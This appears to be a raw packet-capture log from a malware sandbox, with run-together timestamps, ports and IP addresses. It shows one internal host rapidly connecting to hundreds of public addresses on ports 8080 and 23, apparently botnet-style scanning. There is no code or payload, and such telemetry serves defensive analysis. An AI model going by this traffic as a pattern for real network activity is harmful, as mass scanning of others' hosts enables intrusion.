                                              Nov 23, 2023 05:14:51.886203051 CET542028080192.168.2.1362.27.25.56
                                              Nov 23, 2023 05:14:51.886205912 CET542028080192.168.2.1362.144.246.245
                                              Nov 23, 2023 05:14:51.886205912 CET542028080192.168.2.1362.63.190.64
                                              Nov 23, 2023 05:14:51.886210918 CET542028080192.168.2.1385.18.64.228
                                              Nov 23, 2023 05:14:51.886233091 CET542028080192.168.2.1385.73.123.167
                                              Nov 23, 2023 05:14:51.886233091 CET542028080192.168.2.1362.244.222.128
                                              Nov 23, 2023 05:14:51.886234999 CET542028080192.168.2.1331.45.126.50
                                              Nov 23, 2023 05:14:51.886238098 CET542028080192.168.2.1331.116.27.91
                                              Nov 23, 2023 05:14:51.886241913 CET542028080192.168.2.1394.35.3.152
                                              Nov 23, 2023 05:14:51.886245966 CET542028080192.168.2.1331.250.157.213
                                              Nov 23, 2023 05:14:51.886260986 CET542028080192.168.2.1362.115.231.157
                                              Nov 23, 2023 05:14:51.886265993 CET542028080192.168.2.1394.149.160.58
                                              Nov 23, 2023 05:14:51.886265993 CET542028080192.168.2.1331.213.151.138
                                              Nov 23, 2023 05:14:51.886271000 CET542028080192.168.2.1385.4.207.83
                                              Nov 23, 2023 05:14:51.886276007 CET542028080192.168.2.1394.20.168.238
                                              Nov 23, 2023 05:14:51.886277914 CET542028080192.168.2.1385.89.129.150
                                              Nov 23, 2023 05:14:51.886281967 CET542028080192.168.2.1331.48.209.189
                                              Nov 23, 2023 05:14:51.886287928 CET542028080192.168.2.1385.75.48.87
                                              Nov 23, 2023 05:14:51.886293888 CET542028080192.168.2.1331.17.169.48
                                              Nov 23, 2023 05:14:51.886301041 CET542028080192.168.2.1362.128.46.94
                                              Nov 23, 2023 05:14:51.886303902 CET542028080192.168.2.1395.204.159.40
                                              Nov 23, 2023 05:14:51.886315107 CET542028080192.168.2.1385.58.53.63
                                              Nov 23, 2023 05:14:51.886318922 CET542028080192.168.2.1394.52.238.102
                                              Nov 23, 2023 05:14:51.886323929 CET542028080192.168.2.1362.201.68.126
                                              Nov 23, 2023 05:14:51.886323929 CET542028080192.168.2.1395.87.33.164
                                              Nov 23, 2023 05:14:51.886343956 CET542028080192.168.2.1385.93.196.45
                                              Nov 23, 2023 05:14:51.886343956 CET542028080192.168.2.1362.35.240.147
                                              Nov 23, 2023 05:14:51.886347055 CET542028080192.168.2.1395.248.193.208
                                              Nov 23, 2023 05:14:51.886360884 CET542028080192.168.2.1385.10.2.155
                                              Nov 23, 2023 05:14:51.886363029 CET542028080192.168.2.1331.51.169.194
                                              Nov 23, 2023 05:14:51.886363029 CET542028080192.168.2.1395.252.205.98
                                              Nov 23, 2023 05:14:51.886370897 CET542028080192.168.2.1394.78.218.185
                                              Nov 23, 2023 05:14:51.886372089 CET542028080192.168.2.1362.118.166.31
                                              Nov 23, 2023 05:14:51.886373997 CET542028080192.168.2.1331.35.83.41
                                              Nov 23, 2023 05:14:51.886379957 CET542028080192.168.2.1385.159.192.246
                                              Nov 23, 2023 05:14:51.886384010 CET542028080192.168.2.1394.185.140.61
                                              Nov 23, 2023 05:14:51.886399984 CET542028080192.168.2.1395.9.151.217
                                              Nov 23, 2023 05:14:51.886399984 CET542028080192.168.2.1395.64.221.74
                                              Nov 23, 2023 05:14:51.886400938 CET542028080192.168.2.1362.232.191.76
                                              Nov 23, 2023 05:14:51.886415005 CET542028080192.168.2.1394.62.189.35
                                              Nov 23, 2023 05:14:51.886415005 CET542028080192.168.2.1385.251.100.233
                                              Nov 23, 2023 05:14:51.886425018 CET542028080192.168.2.1385.112.127.108
                                              Nov 23, 2023 05:14:51.886429071 CET542028080192.168.2.1394.47.173.61
                                              Nov 23, 2023 05:14:51.886441946 CET542028080192.168.2.1394.254.100.198
                                              Nov 23, 2023 05:14:51.886456013 CET542028080192.168.2.1362.78.198.122
                                              Nov 23, 2023 05:14:51.886457920 CET542028080192.168.2.1331.158.227.178
                                              Nov 23, 2023 05:14:51.886457920 CET542028080192.168.2.1395.136.14.153
                                              Nov 23, 2023 05:14:51.886464119 CET542028080192.168.2.1385.213.190.79
                                              Nov 23, 2023 05:14:51.886472940 CET542028080192.168.2.1385.29.80.5
                                              Nov 23, 2023 05:14:51.886472940 CET542028080192.168.2.1362.205.196.16
                                              Nov 23, 2023 05:14:51.886482954 CET542028080192.168.2.1331.167.159.166
                                              Nov 23, 2023 05:14:51.886493921 CET542028080192.168.2.1331.118.201.210
                                              Nov 23, 2023 05:14:51.886497021 CET542028080192.168.2.1394.162.100.210
                                              Nov 23, 2023 05:14:51.886502981 CET542028080192.168.2.1385.89.191.214
                                              Nov 23, 2023 05:14:51.886507034 CET542028080192.168.2.1362.61.81.17
                                              Nov 23, 2023 05:14:51.886519909 CET542028080192.168.2.1394.50.222.98
                                              Nov 23, 2023 05:14:51.886526108 CET542028080192.168.2.1395.206.103.163
                                              Nov 23, 2023 05:14:51.886526108 CET542028080192.168.2.1331.155.208.93
                                              Nov 23, 2023 05:14:51.886532068 CET542028080192.168.2.1395.172.145.75
                                              Nov 23, 2023 05:14:51.886543989 CET542028080192.168.2.1394.44.28.120
                                              Nov 23, 2023 05:14:51.886544943 CET542028080192.168.2.1395.186.173.168
                                              Nov 23, 2023 05:14:51.886553049 CET542028080192.168.2.1362.254.84.219
                                              Nov 23, 2023 05:14:51.886554956 CET542028080192.168.2.1362.250.92.168
                                              Nov 23, 2023 05:14:51.886559010 CET542028080192.168.2.1362.67.9.21
                                              Nov 23, 2023 05:14:51.886559963 CET542028080192.168.2.1394.75.98.5
                                              Nov 23, 2023 05:14:51.886563063 CET542028080192.168.2.1394.77.250.176
                                              Nov 23, 2023 05:14:51.886565924 CET542028080192.168.2.1395.192.58.147
                                              Nov 23, 2023 05:14:51.886583090 CET542028080192.168.2.1395.210.230.255
                                              Nov 23, 2023 05:14:51.886589050 CET542028080192.168.2.1331.167.16.215
                                              Nov 23, 2023 05:14:51.886591911 CET542028080192.168.2.1362.78.110.155
                                              Nov 23, 2023 05:14:51.886595011 CET542028080192.168.2.1385.244.111.61
                                              Nov 23, 2023 05:14:51.886609077 CET542028080192.168.2.1395.202.16.9
                                              Nov 23, 2023 05:14:51.886611938 CET542028080192.168.2.1395.53.126.170
                                              Nov 23, 2023 05:14:51.886617899 CET542028080192.168.2.1385.74.184.212
                                              Nov 23, 2023 05:14:51.886626005 CET542028080192.168.2.1394.196.40.151
                                              Nov 23, 2023 05:14:51.886636972 CET542028080192.168.2.1394.54.120.63
                                              Nov 23, 2023 05:14:51.886645079 CET542028080192.168.2.1331.65.21.52
                                              Nov 23, 2023 05:14:51.886661053 CET542028080192.168.2.1362.170.115.180
                                              Nov 23, 2023 05:14:51.886661053 CET542028080192.168.2.1362.215.54.164
                                              Nov 23, 2023 05:14:51.886662006 CET542028080192.168.2.1395.23.249.243
                                              Nov 23, 2023 05:14:51.886665106 CET542028080192.168.2.1331.221.109.79
                                              Nov 23, 2023 05:14:51.886665106 CET542028080192.168.2.1385.101.50.217
                                              Nov 23, 2023 05:14:51.886672020 CET542028080192.168.2.1362.188.196.24
                                              Nov 23, 2023 05:14:51.886679888 CET542028080192.168.2.1394.137.206.37
                                              Nov 23, 2023 05:14:51.886681080 CET542028080192.168.2.1385.139.179.243
                                              Nov 23, 2023 05:14:51.886692047 CET542028080192.168.2.1385.57.49.77
                                              Nov 23, 2023 05:14:51.886718988 CET542028080192.168.2.1395.65.110.43
                                              Nov 23, 2023 05:14:51.886718988 CET542028080192.168.2.1394.180.114.162
                                              Nov 23, 2023 05:14:51.886720896 CET542028080192.168.2.1395.188.8.58
                                              Nov 23, 2023 05:14:51.886727095 CET542028080192.168.2.1362.98.21.119
                                              Nov 23, 2023 05:14:51.886735916 CET542028080192.168.2.1394.212.207.47
                                              Nov 23, 2023 05:14:51.886753082 CET542028080192.168.2.1331.179.24.182
                                              Nov 23, 2023 05:14:51.886760950 CET542028080192.168.2.1331.166.250.49
                                              Nov 23, 2023 05:14:51.886761904 CET542028080192.168.2.1395.147.217.123
                                              Nov 23, 2023 05:14:51.886770964 CET542028080192.168.2.1395.240.116.140
                                              Nov 23, 2023 05:14:51.886775017 CET542028080192.168.2.1395.35.89.19
                                              Nov 23, 2023 05:14:51.886786938 CET542028080192.168.2.1362.228.7.24
                                              Nov 23, 2023 05:14:51.886795044 CET542028080192.168.2.1395.209.4.16
                                              Nov 23, 2023 05:14:51.886799097 CET542028080192.168.2.1395.210.11.38
                                              Nov 23, 2023 05:14:51.886805058 CET542028080192.168.2.1385.253.216.26
                                              Nov 23, 2023 05:14:51.886806011 CET542028080192.168.2.1362.174.235.96
                                              Nov 23, 2023 05:14:51.886807919 CET542028080192.168.2.1385.255.63.63
                                              Nov 23, 2023 05:14:51.886821985 CET542028080192.168.2.1385.114.154.214
                                              Nov 23, 2023 05:14:51.886822939 CET542028080192.168.2.1385.70.151.130
                                              Nov 23, 2023 05:14:51.886828899 CET542028080192.168.2.1385.126.159.18
                                              Nov 23, 2023 05:14:51.886828899 CET542028080192.168.2.1395.63.204.81
                                              Nov 23, 2023 05:14:51.886843920 CET542028080192.168.2.1385.252.233.44
                                              Nov 23, 2023 05:14:51.886846066 CET542028080192.168.2.1395.96.110.213
                                              Nov 23, 2023 05:14:51.886847973 CET542028080192.168.2.1385.118.228.144
                                              Nov 23, 2023 05:14:51.886863947 CET542028080192.168.2.1331.48.167.90
                                              Nov 23, 2023 05:14:51.886867046 CET542028080192.168.2.1331.143.37.116
                                              Nov 23, 2023 05:14:51.886873007 CET542028080192.168.2.1385.14.253.78
                                              Nov 23, 2023 05:14:51.886873007 CET542028080192.168.2.1331.15.250.159
                                              Nov 23, 2023 05:14:51.886873007 CET542028080192.168.2.1362.117.221.200
                                              Nov 23, 2023 05:14:51.886883974 CET542028080192.168.2.1331.116.43.185
                                              Nov 23, 2023 05:14:51.886883974 CET542028080192.168.2.1385.46.76.81
                                              Nov 23, 2023 05:14:51.886883974 CET542028080192.168.2.1331.148.51.181
                                              Nov 23, 2023 05:14:51.886890888 CET542028080192.168.2.1362.153.175.41
                                              Nov 23, 2023 05:14:51.886919022 CET574848080192.168.2.1331.200.60.86
                                              Nov 23, 2023 05:14:51.886933088 CET574848080192.168.2.1331.200.60.86
                                              Nov 23, 2023 05:14:51.886965036 CET575028080192.168.2.1331.200.60.86
                                              Nov 23, 2023 05:14:51.888664961 CET235573860.125.199.133192.168.2.13
                                              Nov 23, 2023 05:14:51.903857946 CET2355738211.185.128.140192.168.2.13
                                              Nov 23, 2023 05:14:51.913510084 CET80805744694.121.21.87192.168.2.13
                                              Nov 23, 2023 05:14:51.913568020 CET574468080192.168.2.1394.121.21.87
                                              Nov 23, 2023 05:14:51.913736105 CET574468080192.168.2.1394.121.21.87
                                              Nov 23, 2023 05:14:51.913736105 CET574468080192.168.2.1394.121.21.87
                                              Nov 23, 2023 05:14:51.913737059 CET574648080192.168.2.1394.121.21.87
                                              Nov 23, 2023 05:14:51.914861917 CET3721554970156.253.9.76192.168.2.13
                                              Nov 23, 2023 05:14:51.924485922 CET235573858.96.100.51192.168.2.13
                                              Nov 23, 2023 05:14:51.964461088 CET2355738103.2.232.249192.168.2.13
                                              Nov 23, 2023 05:14:51.987430096 CET80805420294.142.130.30192.168.2.13
                                              Nov 23, 2023 05:14:51.987720966 CET542028080192.168.2.1394.142.130.30
                                              Nov 23, 2023 05:14:52.006791115 CET496948080192.168.2.1331.136.127.219
                                              Nov 23, 2023 05:14:52.018273115 CET235456893.33.192.250192.168.2.13
                                              Nov 23, 2023 05:14:52.018418074 CET5456823192.168.2.1393.33.192.250
                                              Nov 23, 2023 05:14:52.018726110 CET5456823192.168.2.1393.33.192.250
                                              Nov 23, 2023 05:14:52.020641088 CET2355738125.40.44.243192.168.2.13
                                              Nov 23, 2023 05:14:52.033479929 CET2355738218.58.10.186192.168.2.13
                                              Nov 23, 2023 05:14:52.060017109 CET80805420231.169.125.94192.168.2.13
                                              Nov 23, 2023 05:14:52.077470064 CET80805420294.107.42.232192.168.2.13
                                              Nov 23, 2023 05:14:52.077670097 CET542028080192.168.2.1394.107.42.232
                                              Nov 23, 2023 05:14:52.080207109 CET80805420295.175.118.117192.168.2.13
                                              Nov 23, 2023 05:14:52.080255032 CET542028080192.168.2.1395.175.118.117
                                              Nov 23, 2023 05:14:52.083561897 CET80805420295.216.76.88192.168.2.13
                                              Nov 23, 2023 05:14:52.083870888 CET80805420262.20.78.249192.168.2.13
                                              Nov 23, 2023 05:14:52.084306955 CET80805420295.233.109.45192.168.2.13
                                              Nov 23, 2023 05:14:52.089766026 CET80805420231.148.134.215192.168.2.13
                                              Nov 23, 2023 05:14:52.106225014 CET80805420294.122.23.166192.168.2.13
                                              Nov 23, 2023 05:14:52.106384039 CET542028080192.168.2.1394.122.23.166
                                              Nov 23, 2023 05:14:52.110280037 CET80805420231.200.121.20192.168.2.13
                                              Nov 23, 2023 05:14:52.110332012 CET542028080192.168.2.1331.200.121.20
                                              Nov 23, 2023 05:14:52.126761913 CET80805420262.168.171.49192.168.2.13
                                              Nov 23, 2023 05:14:52.127386093 CET80805420231.153.38.7192.168.2.13
                                              Nov 23, 2023 05:14:52.129956961 CET80805420294.191.187.90192.168.2.13
                                              Nov 23, 2023 05:14:52.148583889 CET80805746494.121.21.87192.168.2.13
                                              Nov 23, 2023 05:14:52.148804903 CET574648080192.168.2.1394.121.21.87
                                              Nov 23, 2023 05:14:52.148999929 CET453588080192.168.2.1394.122.23.166
                                              Nov 23, 2023 05:14:52.149000883 CET475088080192.168.2.1394.142.130.30
                                              Nov 23, 2023 05:14:52.149000883 CET391328080192.168.2.1395.175.118.117
                                              Nov 23, 2023 05:14:52.149004936 CET413828080192.168.2.1331.200.121.20
                                              Nov 23, 2023 05:14:52.149027109 CET574648080192.168.2.1394.121.21.87
                                              Nov 23, 2023 05:14:52.149034023 CET457488080192.168.2.1394.107.42.232
                                              Nov 23, 2023 05:14:52.150276899 CET80805744694.121.21.87192.168.2.13
                                              Nov 23, 2023 05:14:52.191237926 CET80804969431.136.127.219192.168.2.13
                                              Nov 23, 2023 05:14:52.191498041 CET496948080192.168.2.1331.136.127.219
                                              Nov 23, 2023 05:14:52.191498041 CET496948080192.168.2.1331.136.127.219
                                              Nov 23, 2023 05:14:52.220254898 CET235456893.33.192.250192.168.2.13
                                              Nov 23, 2023 05:14:52.220391035 CET5456823192.168.2.1393.33.192.250
                                              Nov 23, 2023 05:14:52.250694990 CET80804750894.142.130.30192.168.2.13
                                              Nov 23, 2023 05:14:52.250962973 CET475088080192.168.2.1394.142.130.30
                                              Nov 23, 2023 05:14:52.250962973 CET475088080192.168.2.1394.142.130.30
                                              Nov 23, 2023 05:14:52.250962973 CET475088080192.168.2.1394.142.130.30
                                              Nov 23, 2023 05:14:52.250967026 CET475188080192.168.2.1394.142.130.30
                                              Nov 23, 2023 05:14:52.337515116 CET80804574894.107.42.232192.168.2.13
                                              Nov 23, 2023 05:14:52.337730885 CET457488080192.168.2.1394.107.42.232
                                              Nov 23, 2023 05:14:52.337986946 CET542028080192.168.2.1395.176.145.244
                                              Nov 23, 2023 05:14:52.337986946 CET542028080192.168.2.1331.34.219.193
                                              Nov 23, 2023 05:14:52.337991953 CET542028080192.168.2.1362.105.15.97
                                              Nov 23, 2023 05:14:52.338021994 CET542028080192.168.2.1331.174.167.16
                                              Nov 23, 2023 05:14:52.338021994 CET542028080192.168.2.1362.91.241.49
                                              Nov 23, 2023 05:14:52.338026047 CET542028080192.168.2.1385.133.189.14
                                              Nov 23, 2023 05:14:52.338026047 CET542028080192.168.2.1385.14.78.130
                                              Nov 23, 2023 05:14:52.338026047 CET542028080192.168.2.1385.25.123.88
                                              Nov 23, 2023 05:14:52.338026047 CET542028080192.168.2.1394.160.58.41
                                              Nov 23, 2023 05:14:52.338027000 CET542028080192.168.2.1362.97.87.171
                                              Nov 23, 2023 05:14:52.338027000 CET542028080192.168.2.1362.6.165.143
                                              Nov 23, 2023 05:14:52.338027954 CET542028080192.168.2.1362.118.183.169
                                              Nov 23, 2023 05:14:52.338033915 CET542028080192.168.2.1394.3.72.62
                                              Nov 23, 2023 05:14:52.338033915 CET542028080192.168.2.1395.4.51.175
                                              Nov 23, 2023 05:14:52.338033915 CET542028080192.168.2.1394.31.100.168
                                              Nov 23, 2023 05:14:52.338027000 CET542028080192.168.2.1331.196.176.114
                                              Nov 23, 2023 05:14:52.338037014 CET542028080192.168.2.1362.193.157.2
                                              Nov 23, 2023 05:14:52.338036060 CET542028080192.168.2.1394.65.83.22
                                              Nov 23, 2023 05:14:52.338033915 CET542028080192.168.2.1394.227.192.201
                                              Nov 23, 2023 05:14:52.338027954 CET542028080192.168.2.1362.64.3.17
                                              Nov 23, 2023 05:14:52.338027000 CET542028080192.168.2.1394.88.231.19
                                              Nov 23, 2023 05:14:52.338027000 CET542028080192.168.2.1362.115.233.94
                                              Nov 23, 2023 05:14:52.338036060 CET542028080192.168.2.1394.207.174.42
                                              Nov 23, 2023 05:14:52.338027954 CET542028080192.168.2.1331.212.80.122
                                              Nov 23, 2023 05:14:52.338027000 CET542028080192.168.2.1395.255.64.155
                                              Nov 23, 2023 05:14:52.338028908 CET542028080192.168.2.1394.62.128.239
                                              Nov 23, 2023 05:14:52.338027954 CET542028080192.168.2.1362.21.88.245
                                              Nov 23, 2023 05:14:52.338028908 CET542028080192.168.2.1362.219.11.172
                                              Nov 23, 2023 05:14:52.338027000 CET542028080192.168.2.1395.138.178.251
                                              Nov 23, 2023 05:14:52.338027954 CET542028080192.168.2.1331.125.225.210
                                              Nov 23, 2023 05:14:52.338028908 CET542028080192.168.2.1385.211.49.116
                                              Nov 23, 2023 05:14:52.338028908 CET542028080192.168.2.1385.209.158.236
                                              Nov 23, 2023 05:14:52.338033915 CET542028080192.168.2.1331.170.65.192
                                              Nov 23, 2023 05:14:52.338027954 CET542028080192.168.2.1385.109.113.250
                                              Nov 23, 2023 05:14:52.338036060 CET542028080192.168.2.1331.60.70.154
                                              Nov 23, 2023 05:14:52.338037014 CET542028080192.168.2.1385.11.169.159
                                              Nov 23, 2023 05:14:52.338027000 CET542028080192.168.2.1331.33.228.246
                                              Nov 23, 2023 05:14:52.338036060 CET542028080192.168.2.1331.48.177.238
                                              Nov 23, 2023 05:14:52.338027000 CET542028080192.168.2.1395.142.121.107
                                              Nov 23, 2023 05:14:52.338028908 CET542028080192.168.2.1385.197.213.180
                                              Nov 23, 2023 05:14:52.338033915 CET542028080192.168.2.1394.202.43.244
                                              Nov 23, 2023 05:14:52.338036060 CET542028080192.168.2.1362.12.57.47
                                              Nov 23, 2023 05:14:52.338037014 CET542028080192.168.2.1331.253.96.246
                                              Nov 23, 2023 05:14:52.338033915 CET542028080192.168.2.1362.224.204.242
                                              Nov 23, 2023 05:14:52.338036060 CET542028080192.168.2.1331.234.153.7
                                              Nov 23, 2023 05:14:52.338027000 CET542028080192.168.2.1394.118.5.199
                                              Nov 23, 2023 05:14:52.338037014 CET542028080192.168.2.1331.163.88.74
                                              Nov 23, 2023 05:14:52.338036060 CET542028080192.168.2.1394.239.37.33
                                              Nov 23, 2023 05:14:52.338037014 CET542028080192.168.2.1362.223.78.6
                                              Nov 23, 2023 05:14:52.338036060 CET542028080192.168.2.1394.127.254.117
                                              Nov 23, 2023 05:14:52.338115931 CET542028080192.168.2.1394.159.140.82
                                              Nov 23, 2023 05:14:52.338115931 CET542028080192.168.2.1362.131.149.148
                                              Nov 23, 2023 05:14:52.338115931 CET542028080192.168.2.1362.196.160.110
                                              Nov 23, 2023 05:14:52.338115931 CET542028080192.168.2.1394.107.120.177
                                              Nov 23, 2023 05:14:52.338115931 CET542028080192.168.2.1395.111.248.41
                                              Nov 23, 2023 05:14:52.338115931 CET542028080192.168.2.1331.50.69.51
                                              Nov 23, 2023 05:14:52.338129044 CET542028080192.168.2.1362.4.198.59
                                              Nov 23, 2023 05:14:52.338129044 CET542028080192.168.2.1395.182.79.31
                                              Nov 23, 2023 05:14:52.338129044 CET542028080192.168.2.1331.155.20.9
                                              Nov 23, 2023 05:14:52.338129044 CET542028080192.168.2.1331.46.225.231
                                              Nov 23, 2023 05:14:52.338129044 CET542028080192.168.2.1385.139.55.63
                                              Nov 23, 2023 05:14:52.338129044 CET542028080192.168.2.1331.194.200.101
                                              Nov 23, 2023 05:14:52.338131905 CET542028080192.168.2.1331.60.81.26
                                              Nov 23, 2023 05:14:52.338131905 CET542028080192.168.2.1331.132.197.154
                                              Nov 23, 2023 05:14:52.338133097 CET542028080192.168.2.1331.173.124.53
                                              Nov 23, 2023 05:14:52.338133097 CET542028080192.168.2.1331.164.206.217
                                              Nov 23, 2023 05:14:52.338133097 CET542028080192.168.2.1394.183.155.253
                                              Nov 23, 2023 05:14:52.338133097 CET542028080192.168.2.1331.60.189.22
                                              Nov 23, 2023 05:14:52.338133097 CET542028080192.168.2.1331.24.146.95
                                              Nov 23, 2023 05:14:52.338133097 CET542028080192.168.2.1331.247.198.81
                                              Nov 23, 2023 05:14:52.338135958 CET542028080192.168.2.1385.161.103.245
                                              Nov 23, 2023 05:14:52.338135958 CET542028080192.168.2.1394.39.24.34
                                              Nov 23, 2023 05:14:52.338135958 CET542028080192.168.2.1331.6.7.154
                                              Nov 23, 2023 05:14:52.338135958 CET542028080192.168.2.1395.157.216.51
                                              Nov 23, 2023 05:14:52.338135958 CET542028080192.168.2.1385.9.6.29
                                              Nov 23, 2023 05:14:52.338135958 CET542028080192.168.2.1385.164.178.223
                                              Nov 23, 2023 05:14:52.338149071 CET542028080192.168.2.1362.84.50.105
                                              Nov 23, 2023 05:14:52.338149071 CET542028080192.168.2.1385.157.196.199
                                              Nov 23, 2023 05:14:52.338149071 CET542028080192.168.2.1395.80.89.171
                                              Nov 23, 2023 05:14:52.338149071 CET542028080192.168.2.1331.8.150.25
                                              Nov 23, 2023 05:14:52.338149071 CET542028080192.168.2.1385.128.156.151
                                              Nov 23, 2023 05:14:52.338154078 CET542028080192.168.2.1331.219.140.99
                                              Nov 23, 2023 05:14:52.338154078 CET542028080192.168.2.1395.25.76.199
                                              Nov 23, 2023 05:14:52.338154078 CET542028080192.168.2.1394.28.170.150
                                              Nov 23, 2023 05:14:52.338154078 CET542028080192.168.2.1395.11.159.82
                                              Nov 23, 2023 05:14:52.338154078 CET542028080192.168.2.1331.52.250.9
                                              Nov 23, 2023 05:14:52.338154078 CET542028080192.168.2.1331.192.21.251
                                              Nov 23, 2023 05:14:52.338154078 CET542028080192.168.2.1362.219.26.230
                                              Nov 23, 2023 05:14:52.338172913 CET542028080192.168.2.1331.231.11.236
                                              Nov 23, 2023 05:14:52.338172913 CET542028080192.168.2.1331.250.84.65
                                              Nov 23, 2023 05:14:52.338172913 CET542028080192.168.2.1385.177.239.135
                                              Nov 23, 2023 05:14:52.338172913 CET542028080192.168.2.1395.247.184.3
                                              Nov 23, 2023 05:14:52.338172913 CET542028080192.168.2.1395.72.6.5
                                              Nov 23, 2023 05:14:52.338172913 CET542028080192.168.2.1362.50.90.233
                                              Nov 23, 2023 05:14:52.338187933 CET542028080192.168.2.1362.97.98.5
                                              Nov 23, 2023 05:14:52.338187933 CET542028080192.168.2.1385.2.165.35
                                              Nov 23, 2023 05:14:52.338187933 CET542028080192.168.2.1394.195.5.100
                                              Nov 23, 2023 05:14:52.338191986 CET542028080192.168.2.1395.215.80.217
                                              Nov 23, 2023 05:14:52.338191986 CET542028080192.168.2.1395.206.171.5
                                              Nov 23, 2023 05:14:52.338191986 CET542028080192.168.2.1395.66.144.190
                                              Nov 23, 2023 05:14:52.338191986 CET542028080192.168.2.1385.82.225.177
                                              Nov 23, 2023 05:14:52.338191986 CET542028080192.168.2.1394.244.163.208
                                              Nov 23, 2023 05:14:52.338221073 CET542028080192.168.2.1331.215.145.180
                                              Nov 23, 2023 05:14:52.338221073 CET542028080192.168.2.1394.63.148.67
                                              Nov 23, 2023 05:14:52.338221073 CET542028080192.168.2.1385.40.69.163
                                              Nov 23, 2023 05:14:52.338221073 CET542028080192.168.2.1395.252.8.128
                                              Nov 23, 2023 05:14:52.338221073 CET542028080192.168.2.1395.158.238.160
                                              Nov 23, 2023 05:14:52.338221073 CET542028080192.168.2.1385.3.186.163
                                              Nov 23, 2023 05:14:52.338221073 CET542028080192.168.2.1394.95.157.143
                                              Nov 23, 2023 05:14:52.338237047 CET542028080192.168.2.1385.107.251.251
                                              Nov 23, 2023 05:14:52.338237047 CET542028080192.168.2.1395.73.244.253
                                              Nov 23, 2023 05:14:52.338238001 CET542028080192.168.2.1385.159.255.13
                                              Nov 23, 2023 05:14:52.338238001 CET542028080192.168.2.1331.71.34.215
                                              Nov 23, 2023 05:14:52.338246107 CET542028080192.168.2.1385.244.192.45
                                              Nov 23, 2023 05:14:52.338246107 CET542028080192.168.2.1395.176.122.10
                                              Nov 23, 2023 05:14:52.338246107 CET542028080192.168.2.1331.119.222.30
                                              Nov 23, 2023 05:14:52.338246107 CET542028080192.168.2.1331.210.87.54
                                              Nov 23, 2023 05:14:52.338246107 CET542028080192.168.2.1331.154.184.215
                                              Nov 23, 2023 05:14:52.338277102 CET542028080192.168.2.1395.211.115.48
                                              Nov 23, 2023 05:14:52.338277102 CET542028080192.168.2.1331.122.251.127
                                              Nov 23, 2023 05:14:52.338277102 CET542028080192.168.2.1331.39.226.203
                                              Nov 23, 2023 05:14:52.338277102 CET542028080192.168.2.1362.211.218.17
                                              Nov 23, 2023 05:14:52.338277102 CET542028080192.168.2.1394.7.187.145
                                              Nov 23, 2023 05:14:52.338277102 CET542028080192.168.2.1394.140.241.15
                                              Nov 23, 2023 05:14:52.338287115 CET542028080192.168.2.1385.64.163.13
                                              Nov 23, 2023 05:14:52.338287115 CET542028080192.168.2.1331.40.225.69
                                              Nov 23, 2023 05:14:52.338287115 CET542028080192.168.2.1331.112.59.157
                                              Nov 23, 2023 05:14:52.338287115 CET542028080192.168.2.1362.57.204.156
                                              Nov 23, 2023 05:14:52.338287115 CET542028080192.168.2.1394.154.82.158
                                              Nov 23, 2023 05:14:52.338287115 CET542028080192.168.2.1331.170.51.244
                                              Nov 23, 2023 05:14:52.338291883 CET542028080192.168.2.1331.155.111.4
                                              Nov 23, 2023 05:14:52.338291883 CET542028080192.168.2.1395.250.109.237
                                              Nov 23, 2023 05:14:52.338291883 CET542028080192.168.2.1362.69.84.98
                                              Nov 23, 2023 05:14:52.338291883 CET542028080192.168.2.1395.175.160.66
                                              Nov 23, 2023 05:14:52.338291883 CET542028080192.168.2.1395.237.252.244
                                              Nov 23, 2023 05:14:52.338291883 CET542028080192.168.2.1385.214.156.15
                                              Nov 23, 2023 05:14:52.338291883 CET542028080192.168.2.1362.182.123.233
                                              Nov 23, 2023 05:14:52.338294983 CET542028080192.168.2.1362.137.57.247
                                              Nov 23, 2023 05:14:52.338294983 CET542028080192.168.2.1385.201.8.39
                                              Nov 23, 2023 05:14:52.338294983 CET542028080192.168.2.1385.248.53.210
                                              Nov 23, 2023 05:14:52.338294983 CET542028080192.168.2.1385.69.6.37
                                              Nov 23, 2023 05:14:52.338305950 CET542028080192.168.2.1394.12.15.177
                                              Nov 23, 2023 05:14:52.338305950 CET542028080192.168.2.1362.230.16.49
                                              Nov 23, 2023 05:14:52.338306904 CET542028080192.168.2.1394.27.72.20
                                              Nov 23, 2023 05:14:52.338306904 CET542028080192.168.2.1362.150.166.224
                                              Nov 23, 2023 05:14:52.338306904 CET542028080192.168.2.1395.105.248.198
                                              Nov 23, 2023 05:14:52.338306904 CET542028080192.168.2.1394.15.176.244
                                              Nov 23, 2023 05:14:52.338314056 CET542028080192.168.2.1331.48.115.49
                                              Nov 23, 2023 05:14:52.338314056 CET542028080192.168.2.1395.219.67.234
                                              Nov 23, 2023 05:14:52.338314056 CET542028080192.168.2.1331.25.125.169
                                              Nov 23, 2023 05:14:52.338315010 CET542028080192.168.2.1395.83.23.19
                                              Nov 23, 2023 05:14:52.338315010 CET542028080192.168.2.1395.61.141.113
                                              Nov 23, 2023 05:14:52.338315010 CET542028080192.168.2.1362.144.151.77
                                              Nov 23, 2023 05:14:52.338315010 CET542028080192.168.2.1362.245.109.60
                                              Nov 23, 2023 05:14:52.338315010 CET542028080192.168.2.1395.251.166.31
                                              Nov 23, 2023 05:14:52.338373899 CET542028080192.168.2.1395.135.5.45
                                              Nov 23, 2023 05:14:52.338376999 CET542028080192.168.2.1394.195.64.50
                                              Nov 23, 2023 05:14:52.338376999 CET542028080192.168.2.1385.140.147.243
                                              Nov 23, 2023 05:14:52.338377953 CET542028080192.168.2.1362.34.216.157
                                              Nov 23, 2023 05:14:52.338377953 CET542028080192.168.2.1331.70.136.79
                                              Nov 23, 2023 05:14:52.338377953 CET542028080192.168.2.1394.35.47.214
                                              Nov 23, 2023 05:14:52.338377953 CET542028080192.168.2.1331.20.110.74
                                              Nov 23, 2023 05:14:52.338377953 CET542028080192.168.2.1362.85.196.6
                                              Nov 23, 2023 05:14:52.338377953 CET542028080192.168.2.1385.1.164.9
                                              Nov 23, 2023 05:14:52.338377953 CET542028080192.168.2.1362.192.183.61
                                              Nov 23, 2023 05:14:52.338377953 CET542028080192.168.2.1362.164.177.210
                                              Nov 23, 2023 05:14:52.338385105 CET542028080192.168.2.1362.126.195.63
                                              Nov 23, 2023 05:14:52.338385105 CET542028080192.168.2.1362.175.53.191
                                              Nov 23, 2023 05:14:52.338385105 CET542028080192.168.2.1331.187.145.65
                                              Nov 23, 2023 05:14:52.338385105 CET542028080192.168.2.1331.180.101.242
                                              Nov 23, 2023 05:14:52.338407040 CET542028080192.168.2.1395.235.41.239
                                              Nov 23, 2023 05:14:52.338407040 CET542028080192.168.2.1331.186.101.33
